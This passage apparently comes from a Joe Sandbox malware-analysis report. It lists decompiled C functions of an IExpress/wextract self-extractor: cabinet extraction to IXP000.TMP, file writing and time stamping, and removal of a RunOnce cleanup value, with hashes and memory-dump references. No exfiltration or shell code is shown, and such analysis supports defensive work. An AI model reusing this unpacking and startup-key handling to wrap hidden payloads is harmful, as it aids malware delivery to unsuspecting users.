                              • SetFileAttributesA.KERNELBASE(034B71C0,00000080,?,00000000), ref: 010E52F2
                              • DeleteFileA.KERNELBASE(034B71C0), ref: 010E52FA
                              • LocalFree.KERNEL32(034B71C0,?,00000000), ref: 010E5305
                              • LocalFree.KERNEL32(034B71C0), ref: 010E530C
                              • SetCurrentDirectoryA.KERNELBASE(010E11FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010E5363
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010E5334
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                              • API String ID: 2833751637-305352358
                              • Opcode ID: 96b203831fb1960b7202a10014b8f0346ef4fc179f17a927333348c2a2913e9e
                              • Instruction ID: 518f765314901b669bb77b40eb445f9db83545d19d8411b4a860956d17957d86
                              • Opcode Fuzzy Hash: 96b203831fb1960b7202a10014b8f0346ef4fc179f17a927333348c2a2913e9e
                              • Instruction Fuzzy Hash: 3721C635600214DFEB719B27ED0C7697BF4BB14B18F08859EF9C15B198CBBA9984CB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E1FE1(void* __ecx) {
                              				void* _v8;
                              				long _t4;
                              				long _t7;
                              
                              				if( *0x10e8530 != 0) {
                              					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                              					if(_t4 == 0) {
                              						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                              						_t7 = RegCloseKey(_v8); // executed
                              						return _t7;
                              					}
                              				}
                              				return _t4;
                              			}






                              0x010e1fee
                              0x010e2005
                              0x010e200d
                              0x010e2017
                              0x010e2020
                              0x00000000
                              0x010e2020
                              0x010e200d
                              0x010e2029

                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,010E538C,?,?,010E538C), ref: 010E2005
                              • RegDeleteValueA.KERNELBASE(010E538C,wextract_cleanup0,?,?,010E538C), ref: 010E2017
                              • RegCloseKey.KERNELBASE(010E538C,?,?,010E538C), ref: 010E2020
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: CloseDeleteOpenValue
                              • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                              • API String ID: 849931509-702805525
                              • Opcode ID: f2616b52fe28089c11bf884faa9ea05e27ac0eee436b6c963d611922a019bb27
                              • Instruction ID: 3330ef93976aacdf2493b695b039fd2637ca96a8db1002e202aeabf09e7184da
                              • Opcode Fuzzy Hash: f2616b52fe28089c11bf884faa9ea05e27ac0eee436b6c963d611922a019bb27
                              • Instruction Fuzzy Hash: B7E04831650314FFD7319A93EC4EF597FEDE704B80F100195B98465056D7665A14D704
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E010E4CD0(char* __edx, long _a4, int _a8) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t29;
                              				int _t30;
                              				long _t32;
                              				signed int _t33;
                              				long _t35;
                              				long _t36;
                              				struct HWND__* _t37;
                              				long _t38;
                              				long _t39;
                              				long _t41;
                              				long _t44;
                              				long _t45;
                              				long _t46;
                              				signed int _t50;
                              				long _t51;
                              				char* _t58;
                              				long _t59;
                              				char* _t63;
                              				long _t64;
                              				CHAR* _t71;
                              				CHAR* _t74;
                              				int _t75;
                              				signed int _t76;
                              
                              				_t69 = __edx;
                              				_t29 =  *0x10e8004; // 0x9fdbf5b5
                              				_t30 = _t29 ^ _t76;
                              				_v8 = _t30;
                              				_t75 = _a8;
                              				if( *0x10e91d8 == 0) {
                              					_t32 = _a4;
                              					__eflags = _t32;
                              					if(_t32 == 0) {
                              						_t33 = E010E4E99(_t75);
                              						L35:
                              						return E010E6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                              					}
                              					_t35 = _t32 - 1;
                              					__eflags = _t35;
                              					if(_t35 == 0) {
                              						L9:
                              						_t33 = 0;
                              						goto L35;
                              					}
                              					_t36 = _t35 - 1;
                              					__eflags = _t36;
                              					if(_t36 == 0) {
                              						_t37 =  *0x10e8584; // 0x0
                              						__eflags = _t37;
                              						if(_t37 != 0) {
                              							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                              						}
                              						_t54 = 0x10e91e4;
                              						_t58 = 0x10e91e4;
                              						do {
                              							_t38 =  *_t58;
                              							_t58 =  &(_t58[1]);
                              							__eflags = _t38;
                              						} while (_t38 != 0);
                              						_t59 = _t58 - 0x10e91e5;
                              						__eflags = _t59;
                              						_t71 =  *(_t75 + 4);
                              						_t73 =  &(_t71[1]);
                              						do {
                              							_t39 =  *_t71;
                              							_t71 =  &(_t71[1]);
                              							__eflags = _t39;
                              						} while (_t39 != 0);
                              						_t69 = _t71 - _t73;
                              						_t30 = _t59 + 1 + _t71 - _t73;
                              						__eflags = _t30 - 0x104;
                              						if(_t30 >= 0x104) {
                              							L3:
                              							_t33 = _t30 | 0xffffffff;
                              							goto L35;
                              						}
                              						_t69 = 0x10e91e4;
                              						_t30 = E010E4702( &_v268, 0x10e91e4,  *(_t75 + 4));
                              						__eflags = _t30;
                              						if(__eflags == 0) {
                              							goto L3;
                              						}
                              						_t41 = E010E476D( &_v268, __eflags);
                              						__eflags = _t41;
                              						if(_t41 == 0) {
                              							goto L9;
                              						}
                              						_push(0x180);
                              						_t30 = E010E4980( &_v268, 0x8302); // executed
                              						_t75 = _t30;
                              						__eflags = _t75 - 0xffffffff;
                              						if(_t75 == 0xffffffff) {
                              							goto L3;
                              						}
                              						_t30 = E010E47E0( &_v268);
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						}
                              						 *0x10e93f4 =  *0x10e93f4 + 1;
                              						_t33 = _t75;
                              						goto L35;
                              					}
                              					_t44 = _t36 - 1;
                              					__eflags = _t44;
                              					if(_t44 == 0) {
                              						_t54 = 0x10e91e4;
                              						_t63 = 0x10e91e4;
                              						do {
                              							_t45 =  *_t63;
                              							_t63 =  &(_t63[1]);
                              							__eflags = _t45;
                              						} while (_t45 != 0);
                              						_t74 =  *(_t75 + 4);
                              						_t64 = _t63 - 0x10e91e5;
                              						__eflags = _t64;
                              						_t69 =  &(_t74[1]);
                              						do {
                              							_t46 =  *_t74;
                              							_t74 =  &(_t74[1]);
                              							__eflags = _t46;
                              						} while (_t46 != 0);
                              						_t73 = _t74 - _t69;
                              						_t30 = _t64 + 1 + _t74 - _t69;
                              						__eflags = _t30 - 0x104;
                              						if(_t30 >= 0x104) {
                              							goto L3;
                              						}
                              						_t69 = 0x10e91e4;
                              						_t30 = E010E4702( &_v268, 0x10e91e4,  *(_t75 + 4));
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						}
                              						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                              						_t30 = E010E4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						}
                              						E010E4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                              						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                              						__eflags = _t50;
                              						if(_t50 != 0) {
                              							_t51 = _t50 & 0x00000027;
                              							__eflags = _t51;
                              						} else {
                              							_t51 = 0x80;
                              						}
                              						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						} else {
                              							_t33 = 1;
                              							goto L35;
                              						}
                              					}
                              					_t30 = _t44 - 1;
                              					__eflags = _t30;
                              					if(_t30 == 0) {
                              						goto L3;
                              					}
                              					goto L9;
                              				}
                              				if(_a4 == 3) {
                              					_t30 = E010E4B60( *((intOrPtr*)(_t75 + 0x14)));
                              				}
                              				goto L3;
                              			}































                              0x010e4cd0
                              0x010e4cdb
                              0x010e4ce0
                              0x010e4ce2
                              0x010e4cee
                              0x010e4cf2
                              0x010e4d0e
                              0x010e4d0e
                              0x010e4d11
                              0x010e4e83
                              0x010e4e88
                              0x010e4e98
                              0x010e4e98
                              0x010e4d17
                              0x010e4d17
                              0x010e4d1a
                              0x010e4d2f
                              0x010e4d2f
                              0x00000000
                              0x010e4d2f
                              0x010e4d1c
                              0x010e4d1c
                              0x010e4d1f
                              0x010e4dcb
                              0x010e4dd0
                              0x010e4dd2
                              0x010e4ddd
                              0x010e4ddd
                              0x010e4de3
                              0x010e4de8
                              0x010e4ded
                              0x010e4ded
                              0x010e4def
                              0x010e4df0
                              0x010e4df0
                              0x010e4df4
                              0x010e4df4
                              0x010e4df6
                              0x010e4df9
                              0x010e4dfc
                              0x010e4dfc
                              0x010e4dfe
                              0x010e4dff
                              0x010e4dff
                              0x010e4e03
                              0x010e4e08
                              0x010e4e0a
                              0x010e4e0f
                              0x010e4d03
                              0x010e4d03
                              0x00000000
                              0x010e4d03
                              0x010e4e18
                              0x010e4e20
                              0x010e4e25
                              0x010e4e27
                              0x00000000
                              0x00000000
                              0x010e4e33
                              0x010e4e38
                              0x010e4e3a
                              0x00000000
                              0x00000000
                              0x010e4e40
                              0x010e4e51
                              0x010e4e56
                              0x010e4e5b
                              0x010e4e5e
                              0x00000000
                              0x00000000
                              0x010e4e6a
                              0x010e4e6f
                              0x010e4e71
                              0x00000000
                              0x00000000
                              0x010e4e77
                              0x010e4e7d
                              0x00000000
                              0x010e4e7d
                              0x010e4d25
                              0x010e4d25
                              0x010e4d28
                              0x010e4d36
                              0x010e4d3b
                              0x010e4d40
                              0x010e4d40
                              0x010e4d42
                              0x010e4d43
                              0x010e4d43
                              0x010e4d47
                              0x010e4d4a
                              0x010e4d4a
                              0x010e4d4c
                              0x010e4d4f
                              0x010e4d4f
                              0x010e4d51
                              0x010e4d52
                              0x010e4d52
                              0x010e4d56
                              0x010e4d5b
                              0x010e4d5d
                              0x010e4d62
                              0x00000000
                              0x00000000
                              0x010e4d67
                              0x010e4d6f
                              0x010e4d74
                              0x010e4d76
                              0x00000000
                              0x00000000
                              0x010e4d7c
                              0x010e4d84
                              0x010e4d89
                              0x010e4d8b
                              0x00000000
                              0x00000000
                              0x010e4d94
                              0x010e4d99
                              0x010e4d9e
                              0x010e4da1
                              0x010e4daa
                              0x010e4daa
                              0x010e4da3
                              0x010e4da3
                              0x010e4da3
                              0x010e4db5
                              0x010e4dbb
                              0x010e4dbd
                              0x00000000
                              0x010e4dc3
                              0x010e4dc5
                              0x00000000
                              0x010e4dc5
                              0x010e4dbd
                              0x010e4d2a
                              0x010e4d2a
                              0x010e4d2d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e4d2d
                              0x010e4cf8
                              0x010e4cfd
                              0x010e4d02
                              0x00000000

                              APIs
                              • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 010E4DB5
                              • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 010E4DDD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: AttributesFileItemText
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                              • API String ID: 3625706803-305352358
                              • Opcode ID: 627659d0b0b86bd9f157fede7aae2e531afe7e86a7626ec474f1ee576a40bcdc
                              • Instruction ID: 6a74f7a0d8011e3e3be5f296a84a21226e159b22aa6c832b8d7258e85f33f5a8
                              • Opcode Fuzzy Hash: 627659d0b0b86bd9f157fede7aae2e531afe7e86a7626ec474f1ee576a40bcdc
                              • Instruction Fuzzy Hash: B14126366081068FDB75AE3ED94C6F977E6EB45700F0486E8D8C2D7285DA33DA46C790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E4C37(signed int __ecx, int __edx, int _a4) {
                              				struct _FILETIME _v12;
                              				struct _FILETIME _v20;
                              				FILETIME* _t14;
                              				int _t15;
                              				signed int _t21;
                              
                              				_t21 = __ecx * 0x18;
                              				if( *((intOrPtr*)(_t21 + 0x10e8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                              					L5:
                              					return 0;
                              				} else {
                              					_t14 =  &_v12;
                              					_t15 = SetFileTime( *(_t21 + 0x10e8d74), _t14, _t14, _t14); // executed
                              					if(_t15 == 0) {
                              						goto L5;
                              					}
                              					return 1;
                              				}
                              			}








                              0x010e4c40
                              0x010e4c4a
                              0x010e4c8d
                              0x00000000
                              0x010e4c70
                              0x010e4c70
                              0x010e4c7e
                              0x010e4c86
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e4c8a

                              APIs
                              • DosDateTimeToFileTime.KERNEL32 ref: 010E4C54
                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010E4C66
                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 010E4C7E
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Time$File$DateLocal
                              • String ID:
                              • API String ID: 2071732420-0
                              • Opcode ID: a13b8d3601c31b827841d2792b1936887b38dd653b5e53a35ab0e444621f1db7
                              • Instruction ID: 1738ac42376a1007c5b88f23f4ac824ec6114280dfd98740227646bfae8525a4
                              • Opcode Fuzzy Hash: a13b8d3601c31b827841d2792b1936887b38dd653b5e53a35ab0e444621f1db7
                              • Instruction Fuzzy Hash: 7DF0967260020DBFABA9DFAACC4CDFB7BEDEB0C644744456BA695C3000E635E524C760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E010E487A(CHAR* __ecx, signed int __edx) {
                              				void* _t7;
                              				CHAR* _t11;
                              				long _t18;
                              				long _t23;
                              
                              				_t11 = __ecx;
                              				asm("sbb edi, edi");
                              				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                              				if((__edx & 0x00000100) == 0) {
                              					asm("sbb esi, esi");
                              					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                              				} else {
                              					if((__edx & 0x00000400) == 0) {
                              						asm("sbb esi, esi");
                              						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                              					} else {
                              						_t23 = 1;
                              					}
                              				}
                              				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                              				if(_t7 != 0xffffffff || _t23 == 3) {
                              					return _t7;
                              				} else {
                              					E010E490C(_t11);
                              					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                              				}
                              			}







                              0x010e4880
                              0x010e488c
                              0x010e4894
                              0x010e48a0
                              0x010e48c9
                              0x010e48ce
                              0x010e48a2
                              0x010e48a8
                              0x010e48b7
                              0x010e48bc
                              0x010e48aa
                              0x010e48ac
                              0x010e48ac
                              0x010e48a8
                              0x010e48de
                              0x010e48e7
                              0x010e490b
                              0x010e48ee
                              0x010e48f0
                              0x00000000
                              0x010e4902

                              APIs
                              • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,010E4A23,?,010E4F67,*MEMCAB,00008000,00000180), ref: 010E48DE
                              • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,010E4F67,*MEMCAB,00008000,00000180), ref: 010E4902
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 8e4e6b6b29f3d006b7d8d7d6208a463827b16478dcbd8406ed0794f20a89c48a
                              • Instruction ID: 69ab8053d9bca5e0fe377f073cbc630bc70c3822a907f30e8c5a8e4f8130daae
                              • Opcode Fuzzy Hash: 8e4e6b6b29f3d006b7d8d7d6208a463827b16478dcbd8406ed0794f20a89c48a
                              • Instruction Fuzzy Hash: 4D0162A3E115702AF364402A4C8CFFB559CCBD6634F1B0375BEEAE71C1D5585C0481E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E010E4AD0(signed int _a4, void* _a8, long _a12) {
                              				signed int _t9;
                              				int _t12;
                              				signed int _t14;
                              				signed int _t15;
                              				void* _t20;
                              				struct HWND__* _t21;
                              				signed int _t24;
                              				signed int _t25;
                              
                              				_t20 =  *0x10e858c; // 0x26c
                              				_t9 = E010E3680(_t20);
                              				if( *0x10e91d8 == 0) {
                              					_push(_t24);
                              					_t12 = WriteFile( *(0x10e8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                              					if(_t12 != 0) {
                              						_t25 = _a12;
                              						if(_t25 != 0xffffffff) {
                              							_t14 =  *0x10e9400; // 0x9aa00
                              							_t15 = _t14 + _t25;
                              							 *0x10e9400 = _t15;
                              							if( *0x10e8184 != 0) {
                              								_t21 =  *0x10e8584; // 0x0
                              								if(_t21 != 0) {
                              									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10e93f8, 0);
                              								}
                              							}
                              						}
                              					} else {
                              						_t25 = _t24 | 0xffffffff;
                              					}
                              					return _t25;
                              				} else {
                              					return _t9 | 0xffffffff;
                              				}
                              			}











                              0x010e4ad5
                              0x010e4adb
                              0x010e4ae7
                              0x010e4aee
                              0x010e4b05
                              0x010e4b0d
                              0x010e4b14
                              0x010e4b1a
                              0x010e4b1c
                              0x010e4b21
                              0x010e4b2a
                              0x010e4b2f
                              0x010e4b31
                              0x010e4b39
                              0x010e4b54
                              0x010e4b54
                              0x010e4b39
                              0x010e4b2f
                              0x010e4b0f
                              0x010e4b0f
                              0x010e4b0f
                              0x010e4b5e
                              0x010e4ae9
                              0x010e4aed
                              0x010e4aed

                              APIs
                                • Part of subcall function 010E3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010E369F
                                • Part of subcall function 010E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36B2
                                • Part of subcall function 010E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36DA
                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 010E4B05
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                              • String ID:
                              • API String ID: 1084409-0
                              • Opcode ID: 79a28840dc2ce808149423372b8007b23f28f8ee7b4cfcb18b71ae5eff2f787e
                              • Instruction ID: 679576c095e4b5bba4113c302947220015081da83ade526100ecf983f585c37a
                              • Opcode Fuzzy Hash: 79a28840dc2ce808149423372b8007b23f28f8ee7b4cfcb18b71ae5eff2f787e
                              • Instruction Fuzzy Hash: E00184712002019FDB658F6BDC09BA67BD9B744B25F048265FAB9DF1D4CB7A9811CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E658A(char* __ecx, void* __edx, char* _a4) {
                              				intOrPtr _t4;
                              				char* _t6;
                              				char* _t8;
                              				void* _t10;
                              				void* _t12;
                              				char* _t16;
                              				intOrPtr* _t17;
                              				void* _t18;
                              				char* _t19;
                              
                              				_t16 = __ecx;
                              				_t10 = __edx;
                              				_t17 = __ecx;
                              				_t1 = _t17 + 1; // 0x10e8b3f
                              				_t12 = _t1;
                              				do {
                              					_t4 =  *_t17;
                              					_t17 = _t17 + 1;
                              				} while (_t4 != 0);
                              				_t18 = _t17 - _t12;
                              				_t2 = _t18 + 1; // 0x10e8b40
                              				if(_t2 < __edx) {
                              					_t19 = _t18 + __ecx;
                              					if(_t19 > __ecx) {
                              						_t8 = CharPrevA(__ecx, _t19); // executed
                              						if( *_t8 != 0x5c) {
                              							 *_t19 = 0x5c;
                              							_t19 =  &(_t19[1]);
                              						}
                              					}
                              					_t6 = _a4;
                              					 *_t19 = 0;
                              					while( *_t6 == 0x20) {
                              						_t6 = _t6 + 1;
                              					}
                              					return E010E16B3(_t16, _t10, _t6);
                              				}
                              				return 0x8007007a;
                              			}












                              0x010e6592
                              0x010e6594
                              0x010e6596
                              0x010e6598
                              0x010e6598
                              0x010e659b
                              0x010e659b
                              0x010e659d
                              0x010e659e
                              0x010e65a2
                              0x010e65a4
                              0x010e65a9
                              0x010e65b2
                              0x010e65b6
                              0x010e65ba
                              0x010e65c3
                              0x010e65c5
                              0x010e65c8
                              0x010e65c8
                              0x010e65c3
                              0x010e65c9
                              0x010e65cc
                              0x010e65d2
                              0x010e65d1
                              0x010e65d1
                              0x00000000
                              0x010e65dc
                              0x00000000

                              APIs
                              • CharPrevA.USER32(010E8B3E,010E8B3F,00000001,010E8B3E,-00000003,?,010E60EC,010E1140,?), ref: 010E65BA
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: CharPrev
                              • String ID:
                              • API String ID: 122130370-0
                              • Opcode ID: 311b62462931f9e2efcb58878922fbd33ee24d1c85f4e3b37bd1ffe1c759c1e3
                              • Instruction ID: c0b904de67f717a9ee651895ea08f9bbcb724c232487cede38f1810eddd7d1c0
                              • Opcode Fuzzy Hash: 311b62462931f9e2efcb58878922fbd33ee24d1c85f4e3b37bd1ffe1c759c1e3
                              • Instruction Fuzzy Hash: 50F02D333042509FD331051FA88CBA7BFD99BA5150F18059AE9DAC3205CA678C4583A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E010E621E() {
                              				signed int _v8;
                              				char _v268;
                              				signed int _t5;
                              				void* _t9;
                              				void* _t13;
                              				void* _t19;
                              				void* _t20;
                              				signed int _t21;
                              
                              				_t5 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t5 ^ _t21;
                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                              					0x4f0 = 2;
                              					_t9 = E010E597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                              				} else {
                              					E010E44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                              					 *0x10e9124 = E010E6285();
                              					_t9 = 0;
                              				}
                              				return E010E6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                              			}











                              0x010e6229
                              0x010e6230
                              0x010e6247
                              0x010e626a
                              0x010e6272
                              0x010e6249
                              0x010e6255
                              0x010e625f
                              0x010e6264
                              0x010e6264
                              0x010e6284

                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 010E623F
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: DirectoryErrorLastLoadMessageStringWindows
                              • String ID:
                              • API String ID: 381621628-0
                              • Opcode ID: dcfe451fa124418c4765d3098d065a8058ce17e63e5a48d16372c48ff3e46c03
                              • Instruction ID: 8530d7e38d47f2aac357c3d35eac177b4d3b8ebdf6aa9413968ed63a4110be84
                              • Opcode Fuzzy Hash: dcfe451fa124418c4765d3098d065a8058ce17e63e5a48d16372c48ff3e46c03
                              • Instruction Fuzzy Hash: B6F0B4B0700209AFD760EB769D09BFE36E8DBA4700F40046AA9C5DB181DD769D408750
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E4B60(signed int _a4) {
                              				signed int _t9;
                              				signed int _t15;
                              
                              				_t15 = _a4 * 0x18;
                              				if( *((intOrPtr*)(_t15 + 0x10e8d64)) != 1) {
                              					_t9 = FindCloseChangeNotification( *(_t15 + 0x10e8d74)); // executed
                              					if(_t9 == 0) {
                              						return _t9 | 0xffffffff;
                              					}
                              					 *((intOrPtr*)(_t15 + 0x10e8d60)) = 1;
                              					return 0;
                              				}
                              				 *((intOrPtr*)(_t15 + 0x10e8d60)) = 1;
                              				 *((intOrPtr*)(_t15 + 0x10e8d68)) = 0;
                              				 *((intOrPtr*)(_t15 + 0x10e8d70)) = 0;
                              				 *((intOrPtr*)(_t15 + 0x10e8d6c)) = 0;
                              				return 0;
                              			}





                              0x010e4b66
                              0x010e4b74
                              0x010e4b98
                              0x010e4ba0
                              0x00000000
                              0x010e4bac
                              0x010e4ba4
                              0x00000000
                              0x010e4ba4
                              0x010e4b78
                              0x010e4b7e
                              0x010e4b84
                              0x010e4b8a
                              0x00000000

                              APIs
                              • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,010E4FA1,00000000), ref: 010E4B98
                              Memory Dump Source
